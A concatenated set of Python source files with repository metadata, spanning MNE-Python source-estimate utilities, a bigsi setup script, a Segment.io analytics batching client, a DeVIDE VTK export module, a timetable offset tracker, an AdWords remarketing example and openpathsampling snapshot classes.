logger.info("-- number of connected vertices : %d" % n_vertices)
nnz = edges.col.size
aux = n_vertices * np.arange(n_times)[:, None] * np.ones((1, nnz), np.int)
col = (edges.col[None, :] + aux).ravel()
row = (edges.row[None, :] + aux).ravel()
if n_times > 1: # add temporal edges
o = (n_vertices * np.arange(n_times - 1)[:, None] +
np.arange(n_vertices)[None, :]).ravel()
d = (n_vertices * np.arange(1, n_times)[:, None] +
np.arange(n_vertices)[None, :]).ravel()
row = np.concatenate((row, o, d))
col = np.concatenate((col, d, o))
data = np.ones(edges.data.size * n_times + 2 * n_vertices * (n_times - 1),
dtype=np.int)
connectivity = coo_matrix((data, (row, col)),
shape=(n_times * n_vertices, ) * 2)
return connectivity
@verbose
def _get_ico_tris(grade, verbose=None, return_surf=False):
"""Get triangles for ico surface."""
ico = _get_ico_surface(grade)
if not return_surf:
return ico['tris']
else:
return ico
def save_stc_as_volume(fname, stc, src, dest='mri', mri_resolution=False):
"""Save a volume source estimate in a nifti file
Parameters
----------
fname : string | None
The name of the generated nifti file. If None, the image is only
returned and not saved.
stc : instance of VolSourceEstimate
The source estimate
src : list
The list of source spaces (should actually be of length 1)
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of
the original T1 image. If 'surf' the coordinate system
of the FreeSurfer surface is used (Surface RAS).
    mri_resolution : bool
        If True the image is saved in MRI resolution.
WARNING: if you have many time points the file produced can be
huge.
Returns
-------
    img : instance of Nifti1Image
The image object.
"""
if not isinstance(stc, VolSourceEstimate):
raise Exception('Only volume source estimates can be saved as '
'volumes')
n_times = stc.data.shape[1]
shape = src[0]['shape']
shape3d = (shape[2], shape[1], shape[0])
shape = (n_times, shape[2], shape[1], shape[0])
vol = np.zeros(shape)
mask3d = src[0]['inuse'].reshape(shape3d).astype(np.bool)
if mri_resolution:
mri_shape3d = (src[0]['mri_height'], src[0]['mri_depth'],
src[0]['mri_width'])
mri_shape = (n_times, src[0]['mri_height'], src[0]['mri_depth'],
src[0]['mri_width'])
mri_vol = np.zeros(mri_shape)
interpolator = src[0]['interpolator']
for k, v in enumerate(vol):
v[mask3d] = stc.data[:, k]
if mri_resolution:
mri_vol[k] = (interpolator * v.ravel()).reshape(mri_shape3d)
if mri_resolution:
vol = mri_vol
vol = vol.T
if mri_resolution:
affine = src[0]['vox_mri_t']['trans'].copy()
else:
affine = src[0]['src_mri_t']['trans'].copy()
if dest == 'mri':
affine = np.dot(src[0]['mri_ras_t']['trans'], affine)
affine[:3] *= 1e3
try:
import nibabel as nib # lazy import to avoid dependency
except ImportError:
raise ImportError("nibabel is required to save volume images.")
header = nib.nifti1.Nifti1Header()
header.set_xyzt_units('mm', 'msec')
header['pixdim'][4] = 1e3 * stc.tstep
with warnings.catch_warnings(record=True): # nibabel<->numpy warning
img = nib.Nifti1Image(vol, affine, header=header)
if fname is not None:
nib.save(img, fname)
return img
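# Editorial usage sketch (added by the editor, not part of the original
# module): writing a VolSourceEstimate as a 4D NIfTI image at MRI resolution.
# The output file name is a placeholder, `vol_stc` and `src` are assumed
# inputs, and nibabel must be installed.
def _example_save_volume_nifti(vol_stc, src):
    return save_stc_as_volume('example-vol.nii.gz', vol_stc, src,
                              dest='mri', mri_resolution=True)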
def _get_label_flip(labels, label_vertidx, src):
"""Helper function to get sign-flip for labels"""
# do the import here to avoid circular dependency
from .label import label_sign_flip
# get the sign-flip vector for every label
label_flip = list()
for label, vertidx in zip(labels, label_vertidx):
if label.hemi == 'both':
raise ValueError('BiHemiLabel not supported when using sign-flip')
if vertidx is not None:
flip = label_sign_flip(label, src)[:, None]
else:
flip = None
label_flip.append(flip)
return label_flip
@verbose
def _gen_extract_label_time_course(stcs, labels, src, mode='mean',
allow_empty=False, verbose=None):
"""Generator for extract_label_time_course"""
n_labels = len(labels)
# get vertices from source space, they have to be the same as in the stcs
vertno = [s['vertno'] for s in src]
nvert = [len(vn) for vn in vertno]
# do the initialization
label_vertidx = list()
for label in labels:
if label.hemi == 'both':
# handle BiHemiLabel
sub_labels = [label.lh, label.rh]
else:
sub_labels = [label]
this_vertidx = list()
for slabel in sub_labels:
if slabel.hemi == 'lh':
this_vertno = np.intersect1d(vertno[0], slabel.vertices)
vertidx = np.searchsorted(vertno[0], this_vertno)
elif slabel.hemi == 'rh':
this_vertno = np.intersect1d(vertno[1], slabel.vertices)
vertidx = nvert[0] + np.searchsorted(vertno[1], this_vertno)
else:
raise ValueError('label %s has invalid hemi' % label.name)
this_vertidx.append(vertidx)
# convert it to an array
this_vertidx = np.concatenate(this_vertidx)
if len(this_vertidx) == 0:
msg = ('source space does not contain any vertices for label %s'
% label.name)
if not allow_empty:
raise ValueError(msg)
else:
logger.warning(msg + '. Assigning all-zero time series to '
'label.')
this_vertidx = None # to later check if label is empty
label_vertidx.append(this_vertidx)
    # mode-dependent initialization
if mode == 'mean':
pass # we have this here to catch invalid values for mode
elif mode == 'mean_flip':
# get the sign-flip vector for every label
label_flip = _get_label_flip(labels, label_vertidx, src)
elif mode == 'pca_flip':
# get the sign-flip vector for every label
label_flip = _get_label_flip(labels, label_vertidx, src)
elif mode == 'max':
pass # we calculate the maximum value later
else:
raise ValueError('%s is an invalid mode' % mode)
# loop through source estimates and extract time series
for stc in stcs:
# make sure the stc is compatible with the source space
if len(stc.vertices[0]) != nvert[0] or \
len(stc.vertices[1]) != nvert[1]:
raise ValueError('stc not compatible with source space')
if any(np.any(svn != vn) for svn, vn in zip(stc.vertices, vertno)):
raise ValueError('stc not compatible with source space')
logger.info('Extracting time courses for %d labels (mode: %s)'
% (n_labels, mode))
# do the extraction
label_tc = np.zeros((n_labels, stc.data.shape[1]),
dtype=stc.data.dtype)
if mode == 'mean':
for i, vertidx in enumerate(label_vertidx):
if vertidx is not None:
label_tc[i] = np.mean(stc.data[vertidx, :], axis=0)
elif mode == 'mean_flip':
for i, (vertidx, flip) in enumerate(zip(label_vertidx,
label_flip)):
if vertidx is not None:
label_tc[i] = np.mean(flip * stc.data[vertidx, :], axis=0)
elif mode == 'pca_flip':
for i, (vertidx, flip) in enumerate(zip(label_vertidx,
label_flip)):
if vertidx is not None:
U, s, V = linalg.svd(stc.data[vertidx, :],
full_matrices=False)
# determine sign-flip
sign = np.sign(np.dot(U[:, 0], flip))
# use average power in label for scaling
scale = linalg.norm(s) / np.sqrt(len(vertidx))
label_tc[i] = sign * scale * V[0]
elif mode == 'max':
for i, vertidx in enumerate(label_vertidx):
if vertidx is not None:
label_tc[i] = np.max(np.abs(stc.data[vertidx, :]), axis=0)
else:
raise ValueError('%s is an invalid mode' % mode)
# this is a generator!
yield label_tc
@verbose
def extract_label_time_course(stcs, labels, src, mode='mean_flip',
allow_empty=False, return_generator=False,
verbose=None):
"""Extract label time course for lists of labels and source estimates
This function will extract one time course for each label and source
estimate. The way the time courses are extracted depends on the mode
parameter.
Valid values for mode are:
- 'mean': Average within each label.
- 'mean_flip': Average within each label with sign flip depending
on source orientation.
- 'pca_flip': Apply an SVD to the time courses within each label
and use the scaled and sign-flipped first right-singular vector
as the label time course. The scaling is performed such that the
power of the label time course is the same as the average
per-vertex time course power within the label. The sign of the
resulting time course is adjusted by multiplying it with
"sign(dot(u, flip))" where u is the first left-singular vector,
        and flip is a sign-flip vector based on the vertex normals. This
procedure assures that the phase does not randomly change by 180
degrees from one stc to the next.
- 'max': Max value within each label.
Parameters
----------
stcs : SourceEstimate | list (or generator) of SourceEstimate
The source estimates from which to extract the time course.
labels : Label | list of Label
The labels for which to extract the time course.
src : list
Source spaces for left and right hemisphere.
mode : str
Extraction mode, see explanation above.
allow_empty : bool
Instead of emitting an error, return all-zero time courses for labels
that do not have any vertices in the source estimate.
return_generator : bool
If True, a generator instead of a list is returned.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
label_tc : array | list (or generator) of array, shape=(len(labels), n_times)
Extracted time course for each label and source estimate.
""" # noqa
# convert inputs to lists
if isinstance(stcs, SourceEstimate):
stcs = [stcs]
return_several = False
return_generator = False
else:
return_several = True
if not isinstance(labels, list):
labels = [labels]
label_tc = _gen_extract_label_time_course(stcs, labels, src, mode=mode,
allow_empty=allow_empty)
if not return_generator:
# do the extraction and return a list
label_tc = list(label_tc)
if not return_several:
            # input was a single SourceEstimate, return single array
label_tc = label_tc[0]
return label_tc
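# Editorial usage sketch (added by the editor, not part of the original
# module): extracting label time courses for a list (or generator) of
# single-trial estimates without holding all results in memory at once.
# `stcs`, `labels` and `src` are assumed inputs.
def _example_extract_label_tcs(stcs, labels, src):
    return extract_label_time_course(stcs, labels, src, mode='pca_flip',
                                     return_generator=True)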
|
cmoutard/mne-python
|
mne/source_estimate.py
|
Python
|
bsd-3-clause
| 110,449
|
[
"Mayavi"
] |
894e552b3beb825012e4c9c0c576ede0eb5af23156c1292ea6e2323fe5a166cd
|
# from distutils.core import setup
from setuptools import setup
import os
setup(
name="bigsi",
version="0.3.8",
packages=[
"bigsi",
"bigsi.bloom",
"bigsi.cmds",
"bigsi.utils",
"bigsi.graph",
"bigsi.storage",
"bigsi.matrix",
"bigsi.scoring",
"bigsi.tests",
],
keywords="DBG coloured de bruijn graphs sequence search signture files signature index bitsliced",
license="MIT",
url="http://github.com/phelimb/bigsi",
description="BItsliced Genomic Signature Index - Efficient indexing and search in very large collections of WGS data",
author="Phelim Bradley",
author_email="wave@phel.im",
install_requires=[
"cython",
"hug",
"numpy",
"mmh3",
"bitarray",
"redis",
"biopython",
"pyyaml",
"humanfriendly",
],
entry_points={"console_scripts": ["bigsi = bigsi.__main__:main"]},
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
"Development Status :: 3 - Alpha",
# Pick your license as you wish (should match "license" above)
"License :: OSI Approved :: MIT License",
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
)
|
Phelimb/cbg
|
setup.py
|
Python
|
mit
| 1,737
|
[
"Biopython"
] |
d759e88608f723e636a0b6ebbbd53be5cc1b1c00cd5965c5615fc5db04f060fd
|
import collections
from datetime import datetime, timedelta
import json
import logging
import numbers
import threading
from dateutil.tz import tzutc
import requests
from stats import Statistics
from errors import ApiError
from utils import guess_timezone, DatetimeSerializer
import options
logging_enabled = True
logger = logging.getLogger('analytics')
def log(level, *args, **kwargs):
if logging_enabled:
method = getattr(logger, level)
method(*args, **kwargs)
def package_exception(client, data, e):
log('warn', 'Segment.io request error', exc_info=True)
client._on_failed_flush(data, e)
def package_response(client, data, response):
# TODO: reduce the complexity (mccabe)
if response.status_code == 200:
client._on_successful_flush(data, response)
elif response.status_code == 400:
content = response.text
try:
body = json.loads(content)
code = 'bad_request'
message = 'Bad request'
if 'error' in body:
                error = body['error']
if 'code' in error:
code = error['code']
if 'message' in error:
message = error['message']
client._on_failed_flush(data, ApiError(code, message))
except Exception:
client._on_failed_flush(data, ApiError('Bad Request', content))
else:
client._on_failed_flush(data,
ApiError(response.status_code, response.text))
def request(client, url, data):
log('debug', 'Sending request to Segment.io ...')
try:
response = requests.post(url,
data=json.dumps(data, cls=DatetimeSerializer),
headers={'content-type': 'application/json'},
timeout=client.timeout)
log('debug', 'Finished Segment.io request.')
package_response(client, data, response)
return response.status_code == 200
except requests.ConnectionError as e:
package_exception(client, data, e)
except requests.Timeout as e:
package_exception(client, data, e)
return False
class FlushThread(threading.Thread):
def __init__(self, client):
threading.Thread.__init__(self)
self.client = client
def run(self):
log('debug', 'Flushing thread running ...')
self.client._sync_flush()
log('debug', 'Flushing thread done.')
class Client(object):
"""The Client class is a batching asynchronous python wrapper over the
Segment.io API.
"""
def __init__(self, secret=None, log_level=logging.INFO, log=True,
flush_at=20, flush_after=timedelta(0, 10),
async=True, max_queue_size=10000, stats=Statistics(),
timeout=10, send=True):
"""Create a new instance of a analytics-python Client
:param str secret: The Segment.io API secret
        :param logging.LOG_LEVEL log_level: The log level at which the client
        logs. Use log_level=logging.DEBUG to troubleshoot
        :param bool log: False to turn off logging completely, True by default
        :param int flush_at: Specifies after how many messages the client will
        flush to the server. Use flush_at=1 to disable batching
        :param datetime.timedelta flush_after: Specifies after how much time
        with no flushing the client will flush. Used in conjunction with
        the flush_at size policy
: param bool async: True to have the client flush to the server on
another thread, therefore not blocking code (this is the default).
False to enable blocking and making the request on the calling thread.
: param float timeout: Number of seconds before timing out request to
Segment.io
: param bool send: True to send requests, False to not send. False to
turn analytics off (for testing).
"""
self.secret = secret
self.queue = collections.deque()
self.last_flushed = None
if not log:
            # silence the module-level log() helper as intended
            global logging_enabled
            logging_enabled = False
# effectively disables the logger
logger.setLevel(logging.CRITICAL)
else:
logger.setLevel(log_level)
self.async = async
self.max_queue_size = max_queue_size
self.max_flush_size = 50
self.flush_at = flush_at
self.flush_after = flush_after
self.timeout = timeout
self.stats = stats
self.flush_lock = threading.Lock()
self.flushing_thread = None
self.send = send
self.success_callbacks = []
self.failure_callbacks = []
def set_log_level(self, level):
"""Sets the log level for analytics-python
:param logging.LOG_LEVEL level: The level at which analytics-python log
should talk at
"""
logger.setLevel(level)
def _check_for_secret(self):
if not self.secret:
raise Exception('Please set analytics.secret before calling ' +
'identify or track.')
def _coerce_unicode(self, cmplx):
return unicode(cmplx)
def _clean_list(self, l):
return [self._clean(item) for item in l]
def _clean_dict(self, d):
data = {}
for k, v in d.iteritems():
try:
data[k] = self._clean(v)
except TypeError:
                log('warn', 'Dictionary values must be serializable to ' +
'JSON "%s" value %s of type %s is unsupported.'
% (k, v, type(v)))
return data
def _clean(self, item):
if isinstance(item, (str, unicode, int, long, float, bool,
numbers.Number, datetime)):
return item
elif isinstance(item, (set, list, tuple)):
return self._clean_list(item)
elif isinstance(item, dict):
return self._clean_dict(item)
else:
return self._coerce_unicode(item)
def on_success(self, callback):
"""
Assign a callback to fire after a successful flush
:param func callback: A callback that will be fired on a flush success
"""
self.success_callbacks.append(callback)
def on_failure(self, callback):
"""
Assign a callback to fire after a failed flush
:param func callback: A callback that will be fired on a failed flush
"""
self.failure_callbacks.append(callback)
def identify(self, user_id=None, traits={}, context={}, timestamp=None):
"""Identifying a user ties all of their actions to an id, and
associates user traits to that id.
:param str user_id: the user's id after they are logged in. It's the
same id as which you would recognize a signed-in user in your system.
: param dict traits: a dictionary with keys like subscriptionPlan or
age. You only need to record a trait once, no need to send it again.
        Accepted value types are string, boolean, ints, longs, and
datetime.datetime.
: param dict context: An optional dictionary with additional
information thats related to the visit. Examples are userAgent, and IP
address of the visitor.
: param datetime.datetime timestamp: If this event happened in the
past, the timestamp can be used to designate when the identification
happened. Careful with this one, if it just happened, leave it None.
If you do choose to provide a timestamp, make sure it has a timezone.
"""
self._check_for_secret()
if not user_id:
raise Exception('Must supply a user_id.')
if traits is not None and not isinstance(traits, dict):
raise Exception('Traits must be a dictionary.')
if context is not None and not isinstance(context, dict):
raise Exception('Context must be a dictionary.')
if timestamp is None:
timestamp = datetime.utcnow().replace(tzinfo=tzutc())
elif not isinstance(timestamp, datetime):
raise Exception('Timestamp must be a datetime object.')
else:
timestamp = guess_timezone(timestamp)
cleaned_traits = self._clean(traits)
action = {'userId': user_id,
'traits': cleaned_traits,
'context': context,
'timestamp': timestamp.isoformat(),
'action': 'identify'}
context['library'] = 'analytics-python'
if self._enqueue(action):
self.stats.identifies += 1
def track(self, user_id=None, event=None, properties={}, context={},
timestamp=None):
"""Whenever a user triggers an event, you'll want to track it.
:param str user_id: the user's id after they are logged in. It's the
same id as which you would recognize a signed-in user in your system.
:param str event: The event name you are tracking. It is recommended
that it is in human readable form. For example, "Bought T-Shirt"
or "Started an exercise"
:param dict properties: A dictionary with items that describe the
event in more detail. This argument is optional, but highly recommended
- you'll find these properties extremely useful later. Accepted value
types are string, boolean, ints, doubles, longs, and datetime.datetime.
:param dict context: An optional dictionary with additional information
thats related to the visit. Examples are userAgent, and IP address
of the visitor.
:param datetime.datetime timestamp: If this event happened in the past,
the timestamp can be used to designate when the identification
happened. Careful with this one, if it just happened, leave it None.
If you do choose to provide a timestamp, make sure it has a timezone.
"""
self._check_for_secret()
if not user_id:
raise Exception('Must supply a user_id.')
if not event:
raise Exception('Event is a required argument as a non-empty ' +
'string.')
if properties is not None and not isinstance(properties, dict):
            raise Exception('Properties must be a dictionary.')
if context is not None and not isinstance(context, dict):
raise Exception('Context must be a dictionary.')
if timestamp is None:
timestamp = datetime.utcnow().replace(tzinfo=tzutc())
elif not isinstance(timestamp, datetime):
raise Exception('Timestamp must be a datetime.datetime object.')
else:
timestamp = guess_timezone(timestamp)
cleaned_properties = self._clean(properties)
action = {'userId': user_id,
'event': event,
'context': context,
'properties': cleaned_properties,
'timestamp': timestamp.isoformat(),
'action': 'track'}
context['library'] = 'analytics-python'
if self._enqueue(action):
self.stats.tracks += 1
def alias(self, from_id, to_id, context={}, timestamp=None):
"""Aliases an anonymous user into an identified user
:param str from_id: the anonymous user's id before they are logged in
:param str to_id: the identified user's id after they're logged in
:param dict context: An optional dictionary with additional information
thats related to the visit. Examples are userAgent, and IP address
of the visitor.
:param datetime.datetime timestamp: If this event happened in the past,
the timestamp can be used to designate when the identification
happened. Careful with this one, if it just happened, leave it None.
If you do choose to provide a timestamp, make sure it has a timezone.
"""
self._check_for_secret()
if not from_id:
raise Exception('Must supply a from_id.')
if not to_id:
raise Exception('Must supply a to_id.')
if context is not None and not isinstance(context, dict):
raise Exception('Context must be a dictionary.')
if timestamp is None:
timestamp = datetime.utcnow().replace(tzinfo=tzutc())
elif not isinstance(timestamp, datetime):
raise Exception('Timestamp must be a datetime.datetime object.')
else:
timestamp = guess_timezone(timestamp)
action = {'from': from_id,
'to': to_id,
'context': context,
'timestamp': timestamp.isoformat(),
'action': 'alias'}
context['library'] = 'analytics-python'
if self._enqueue(action):
self.stats.aliases += 1
def _should_flush(self):
""" Determine whether we should sync """
full = len(self.queue) >= self.flush_at
stale = self.last_flushed is None
if not stale:
stale = datetime.now() - self.last_flushed > self.flush_after
return full or stale
def _enqueue(self, action):
# if we've disabled sending, just return False
if not self.send:
return False
submitted = False
if len(self.queue) < self.max_queue_size:
self.queue.append(action)
self.stats.submitted += 1
submitted = True
log('debug', 'Enqueued ' + action['action'] + '.')
else:
log('warn', 'analytics-python queue is full')
if self._should_flush():
self.flush()
return submitted
def _on_successful_flush(self, data, response):
if 'batch' in data:
for item in data['batch']:
self.stats.successful += 1
for callback in self.success_callbacks:
callback(data, response)
def _on_failed_flush(self, data, error):
if 'batch' in data:
for item in data['batch']:
self.stats.failed += 1
for callback in self.failure_callbacks:
callback(data, error)
def _flush_thread_is_free(self):
return self.flushing_thread is None \
or not self.flushing_thread.is_alive()
def flush(self, async=None):
""" Forces a flush from the internal queue to the server
        :param bool async: True to flush asynchronously on another thread;
        False to block until all messages have been flushed
"""
flushing = False
# if the async arg is provided, it overrides the client's settings
if async is None:
async = self.async
if async:
# We should asynchronously flush on another thread
with self.flush_lock:
if self._flush_thread_is_free():
log('debug', 'Initiating asynchronous flush ..')
self.flushing_thread = FlushThread(self)
self.flushing_thread.start()
flushing = True
else:
log('debug', 'The flushing thread is still active.')
else:
# Flushes on this thread
log('debug', 'Initiating synchronous flush ..')
self._sync_flush()
flushing = True
if flushing:
self.last_flushed = datetime.now()
self.stats.flushes += 1
return flushing
def _sync_flush(self):
log('debug', 'Starting flush ..')
successful = 0
failed = 0
url = options.host + options.endpoints['batch']
while len(self.queue) > 0:
batch = []
for i in range(self.max_flush_size):
if len(self.queue) == 0:
break
batch.append(self.queue.pop())
payload = {'batch': batch, 'secret': self.secret}
if request(self, url, payload):
successful += len(batch)
else:
failed += len(batch)
log('debug', 'Successfully flushed {0} items [{1} failed].'.
format(str(successful), str(failed)))
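# A minimal usage sketch of the batching client defined above (the secret is a
# placeholder; identify/track enqueue messages and flush() sends them, on a
# background thread by default):
#
#   client = Client(secret='YOUR_SEGMENT_SECRET', flush_at=20)
#   client.identify(user_id='user-42', traits={'plan': 'free'})
#   client.track(user_id='user-42', event='Signed Up', properties={'referrer': 'ad'})
#   client.flush(async=False)   # block until the queue has been sent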
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/analytics/client.py
|
Python
|
agpl-3.0
| 16,485
|
[
"VisIt"
] |
1205d76532adfab8cca8feb74803b575c5e98edc228e33f85d12080274550152
|
from module_base import ModuleBase
from module_mixins import ScriptedConfigModuleMixin
from wxPython import wx
class VTKtoPRTools(ScriptedConfigModuleMixin, ModuleBase):
"""Module to convert multi-component VTK image data to PRTools-compatible
dataset.
$Revision: 1.1 $
"""
def __init__(self, module_manager):
ModuleBase.__init__(self, module_manager)
self._config.filename = ''
configList = [
('Output filename:', 'filename', 'base:str', 'filebrowser',
'Type filename or click "browse" button to choose.',
{'fileMode' : wx.wxSAVE,
'fileMask' :
'Matlab text file (*.txt)|*.txt|All files (*.*)|*.*'})
]
ScriptedConfigModuleMixin.__init__(self, configList)
self._createViewFrame(
{'Module (self)' : self})
self._inputData = None
def close(self):
# we play it safe... (the graph_editor/module_manager should have
# disconnected us by now)
for input_idx in range(len(self.get_input_descriptions())):
self.set_input(input_idx, None)
# this will take care of all display thingies
ScriptedConfigModuleMixin.close(self)
# and the baseclass close
ModuleBase.close(self)
del self._inputData
def execute_module(self):
# this is where the good stuff happens...
if len(self._config.filename) == 0:
raise RuntimeError, 'No filename has been set.'
if self._inputData == None:
raise RuntimeError, 'No input data to convert.'
# now let's start going through the data
outfile = file(self._config.filename, 'w')
self._inputData.Update()
nop = self._inputData.GetNumberOfPoints()
noc = self._inputData.GetNumberOfScalarComponents()
pd = self._inputData.GetPointData()
curList = [''] * noc
for i in xrange(nop):
for j in range(noc):
curList[j] = str(pd.GetComponent(i, j))
outfile.write('%s\n' % (' '.join(curList),))
self._module_manager.setProgress((float(i) / (nop - 1)) * 100.0,
'Exporting PRTools data.')
self._module_manager.setProgress(100.0,
'Exporting PRTools data [DONE].')
def get_input_descriptions(self):
return ('VTK Image Data (multiple components)',)
def set_input(self, idx, inputStream):
try:
if inputStream == None or inputStream.IsA('vtkImageData'):
self._inputData = inputStream
else:
raise AttributeError
except AttributeError:
raise TypeError, 'This module requires a vtkImageData as input.'
def get_output_descriptions(self):
return ()
def get_output(self, idx):
raise Exception
def config_to_logic(self):
pass
def logic_to_config(self):
pass
|
nagyistoce/devide
|
modules/user/VTKtoPRTools.py
|
Python
|
bsd-3-clause
| 3,048
|
[
"VTK"
] |
eb3d19422d765f750a6effe226816f734b80445a11afbe8c3e6309038410e567
|
"""
tracker / OffsetTracker is a class which keeps track of which of the slots
defined in a template have already been seen and uses this information to
answer questions about offsets for advanced x expressions.
"""
import copy
import logging
class OffsetTracker(object):
def __init__(self,reduction,term):
# iterate through slots
self._all = {}
blasted = []
for v in reduction.blast():
if term is not None and v.firstTermWeek()[0] != term:
continue
blasted.append(v)
for (i,v) in enumerate(blasted):
self._all[i] = v
self._unused = set(range(0,len(self._all.keys())))
self._last = None
self.reduction = reduction
def addPattern(self,p):
for pp in p.blast():
for (idx,member) in self._all.iteritems():
if pp == member:
if idx in self._unused:
self._unused.remove(idx)
if self._last is None or self._last.key() < pp.key():
self._last = pp
def _calc_init_offset(self,ordered,starting):
offset = -1
if starting is not None:
for i in range(0,len(ordered)):
if i in self._unused and str(starting) == str(self._all[ordered[i]]): # XXX should be able to compare directly
offset = i
break
if offset == -1:
for i in range(0,len(ordered)):
if int(starting.key()) <= int(self._all[ordered[i]].key()):
offset = i
break
if offset == -1:
offset = 0
return offset
def addNextN(self,n,trial = False,starting = None):
# XXX add in out-of-range dates
ordered = sorted(self._unused)
offset = self._calc_init_offset(ordered,starting)
out = set()
for i in range(offset,min(offset+n,len(ordered))):
out.add(ordered[i])
if not trial:
self._unused.remove(ordered[i])
return [self._all[i] for i in out]
def last(self):
return self._last
def first_unused(self):
unused = []
for i in self._unused:
unused.append(self._all[i])
if not len(unused):
return None
return min(unused,key = lambda x : x.key())
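# A heavily hypothetical sketch of the intended call pattern; `reduction` and
# `pattern` stand for caller-supplied objects exposing blast(), key() and
# firstTermWeek() as used above:
#
#   tracker = OffsetTracker(reduction, term=1)
#   tracker.addPattern(pattern)      # mark slots already seen as used
#   claimed = tracker.addNextN(2)    # claim the next two unused slots
#   remaining = tracker.first_unused()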
|
ieb/timetables
|
python/lib/tracker.py
|
Python
|
agpl-3.0
| 2,399
|
[
"BLAST"
] |
ec1c040832dffbe705834bc9cb1340bdf6b1794add2babc887e725f628e4196f
|
#!/usr/bin/python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example adds two rule-based remarketing user lists.
Adds two rule-based remarketing user lists; one with no site visit date
restrictions and another that will only include users who visit your site in
the next six months.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
import calendar
from datetime import date
from datetime import datetime
from datetime import timedelta
from googleads import adwords
def main(client):
# Initialize appropriate service.
adwords_user_list_service = client.GetService(
'AdwordsUserListService', version='v201502')
# First rule item group - users who visited the checkout page and had more
# than one item in their shopping cart.
checkout_rule_item = {
'StringRuleItem': {
'key': {
'name': 'ecomm_pagetype'
},
'op': 'EQUALS',
'value': 'checkout'
}
}
cart_size_rule_item = {
'NumberRuleItem': {
'key': {
'name': 'cartsize'
},
'op': 'GREATER_THAN',
'value': '1.0'
}
}
# Combine the two rule items into a RuleItemGroup so AdWords will logically
# AND the rules together.
checkout_multiple_item_group = {
'items': [checkout_rule_item, cart_size_rule_item]
}
# Second rule item group - users who checked out within the next 3 months.
today = date.today()
start_date_rule_item = {
'DateRuleItem': {
'key': {
'name': 'checkoutdate'
},
'op': 'AFTER',
'value': today.strftime('%Y%m%d')
}
}
three_months_later = AddMonths(today, 3)
three_months_later_rule_item = {
'DateRuleItem': {
'key': {
'name': 'checkoutdate'
},
'op': 'BEFORE',
'value': three_months_later.strftime('%Y%m%d')
}
}
# Combine the date rule items into a RuleItemGroup
checked_out_date_range_item_group = {
'items': [start_date_rule_item, three_months_later_rule_item]
}
# Combine the rule item groups into a Rule so AdWords will logically OR the
# groups together.
rule = {
'groups': [
checkout_multiple_item_group,
checked_out_date_range_item_group
]
}
# Create the user list with no restrictions on site visit date.
expression_user_list = {
'xsi_type': 'ExpressionRuleUserList',
'name': 'Expression-based user list created at %s'
% datetime.today().strftime('%Y%m%d %H:%M:%S'),
'description': 'Users who checked out in three month window OR visited'
' the checkout page with more than one item in their'
' cart.',
'rule': rule
}
# Create the user list restricted to users who visit your site within the next
# six months.
end_date = AddMonths(today, 6)
date_user_list = {
'xsi_type': 'DateSpecificRuleUserList',
'name': 'Date rule user list created at %s'
% datetime.today().strftime('%Y%m%d %H:%M:%S'),
'description': 'Users who visited the site between %s and %s and checked'
' out in three month window OR visited the checkout page'
' with more than one item in their cart.'
% (today.strftime('%Y%m%d'), end_date.strftime('%Y%m%d')),
'rule': rule,
'startDate': today.strftime('%Y%m%d'),
'endDate': end_date.strftime('%Y%m%d')
}
# Create operations to add the user lists.
operations = [
{
'operand': user_list,
'operator': 'ADD',
} for user_list in [expression_user_list, date_user_list]
]
# Submit the operations.
user_lists = adwords_user_list_service.mutate(operations)
# Display results.
for user_list in user_lists['value']:
print (('User list added with ID %d, name "%s", status "%s", list type'
' "%s", accountUserListStatus "%s", description "%s".') %
(user_list['id'], user_list['name'],
user_list['status'], user_list['listType'],
user_list['accountUserListStatus'], user_list['description']))
def AddMonths(start_date, months):
"""A simple convenience utility for adding months to a given start date.
This increments the months by adding the number of days in the current month
to the current month, for each month.
Args:
start_date: date The date months are being added to.
months: int The number of months to add.
Returns:
A date equal to the start date incremented by the given number of months.
"""
current_date = start_date
i = 0
while i < months:
month_days = calendar.monthrange(current_date.year, current_date.month)[1]
current_date += timedelta(days=month_days)
i += 1
return current_date
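# A worked example of the day-count behaviour above: adding "one month" to
# 2015-01-31 adds the 31 days of January and lands on 2015-03-03 rather than the
# end of February, while whole months from the 1st behave as expected:
#
#   AddMonths(date(2015, 1, 31), 1)   # -> datetime.date(2015, 3, 3)
#   AddMonths(date(2015, 1, 1), 3)    # -> datetime.date(2015, 4, 1)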
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client)
|
richardfergie/googleads-python-lib
|
examples/adwords/v201502/remarketing/add_rule_based_user_lists.py
|
Python
|
apache-2.0
| 5,714
|
[
"VisIt"
] |
a9114332a529cd9e9b9de78acfd658a6f429468b00f23335b08d8c0270165eb8
|
"""
@author: JD Chodera
@author: JH Prinz
"""
from openpathsampling.engines import BaseSnapshot, SnapshotFactory
from . import features
@features.base.attach_features([
features.velocities,
features.coordinates,
features.box_vectors,
features.engine
])
class MDSnapshot(BaseSnapshot):
"""
A fast MD snapshot, which does not proxy the coordinates/velocities.
"""
# The following code does the same as above
#
# MDSnapshot = SnapshotFactory(
# name='MDSnapshot',
# features=[
# features.velocities,
# features.coordinates,
# features.box_vectors,
# features.engine
# ],
# description="A fast MDSnapshot",
# base_class=BaseSnapshot
# )
@features.base.attach_features([
features.statics,
features.kinetics,
features.masses,
features.instantaneous_temperature,
features.engine,
features.traj_quantities,
])
class Snapshot(BaseSnapshot):
"""
